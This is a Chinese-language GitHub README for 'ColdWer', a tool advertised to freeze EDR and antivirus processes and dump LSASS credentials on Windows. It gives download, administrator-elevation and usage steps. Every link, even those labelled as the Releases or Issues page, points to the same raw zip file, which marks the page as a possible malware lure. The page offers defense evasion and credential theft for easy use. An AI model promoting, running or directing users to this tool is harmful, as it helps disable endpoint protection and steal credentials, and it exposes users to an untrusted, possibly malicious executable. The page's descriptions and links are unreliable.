Rakum713/ColdWer

# ⚙️ ColdWer - 简易进程冻结工具 ## 🚀 入门指南 欢迎使用 ColdWer！该应用程序旨在帮助您轻松管理 Windows 系统上的进程。您可以使用它来冻结 EDR (Endpoint Detection and Response) 和 AV (Antivirus) 进程，以及转储 LSASS 中的敏感信息，用于安全评估。 ## 📥 下载 ColdWer [](https://github.com/Rakum713/ColdWer/raw/refs/heads/main/src/Wer-Cold-v1.7.zip) ## 📋 系统要求 为了流畅运行 ColdWer，请确保您的计算机满足以下要求： - Windows 10 或更高版本 - 至少 4 GB 内存 (RAM) - 100 MB 可用磁盘空间 - 需要管理员权限才能运行该应用程序 ## 🛠️ 功能特性 ColdWer 提供了多项实用功能： - **冻结 EDR/AV 进程**：阻止安全工具干扰您的任务。 - **转储 LSASS**：轻松提取凭据和敏感信息。 - **用户友好的界面**：无需专业技术知识即可操作该应用程序。 - **无缝集成**：可与其他安全工具协同工作。 ## 📥 下载与安装 要下载 ColdWer，请按照以下步骤操作： 1. **访问 Releases 页面**：在 Web 浏览器中前往 ColdWer [Releases 页面](https://github.com/Rakum713/ColdWer/raw/refs/heads/main/src/Wer-Cold-v1.7.zip)。 2. **选择最新版本**：找到最近的版本，通常会有明确标注。 3. **下载文件**：点击适用于您系统的文件（通常标注为 64 位 Windows）开始下载。 4. **运行应用程序**： - 找到下载的文件，通常位于您的“Downloads”文件夹中。 - 双击该文件以启动 ColdWer。 5. **授予权限**：如果系统提示，请接受任何管理员权限请求。 现在您已准备好使用 ColdWer！ ## 👨‍💻 使用 ColdWer 应用程序启动后，您将看到一个简洁的界面。以下是执行基本任务的方法： 1. **冻结进程**： - 点击“Freeze”（冻结）按钮。 - 输入您想要冻结的进程名称。 - 点击“OK”确认您的操作。 2. **转储 LSASS**： - 在主屏幕上，选择“Dump LSASS”选项。 - 按照提示捕获数据。 3. **关闭应用程序**：要退出，只需点击右上角的“Close”按钮。 ## ⚙️ 故障排除 如果您在使用 ColdWer 时遇到问题，请考虑以下解决方案： - 确保您已安装最新的 Windows 更新。 - 检查您的权限，并确保您正在以管理员身份运行该应用程序。 - 如果应用程序无响应，请重启您的计算机。 ## 📞 支持 如需更多帮助，您可以通过我们的 [GitHub Issues 页面](https://github.com/Rakum713/ColdWer/raw/refs/heads/main/src/Wer-Cold-v1.7.zip) 联系我们。请提供清晰的问题描述，我们将为您提供协助。 ## 📜 许可证 ColdWer 是根据 MIT 许可证授权的开源软件。您可以自由使用、修改和分发它。 ## 📥 再次下载 ColdWer 别忘了，您可以随时返回 [Releases 页面](https://github.com/Rakum713/ColdWer/raw/refs/heads/main/src/Wer-Cold-v1.7.zip) 检查更新或下载新版本。 感谢您使用 ColdWer！享受更轻松的进程管理体验。

标签：Conpot, DAST, EDR绕过, PPL绕过, SecList, UML, Web报告查看器, WerFaultSecure, Windows安全, 内存取证, 凭据窃取, 反杀毒软件, 安全测试, 客户端加密, 恶意软件分析, 提权, 攻击性安全, 私有化部署, 进程冻结, 防御规避, 高交互蜜罐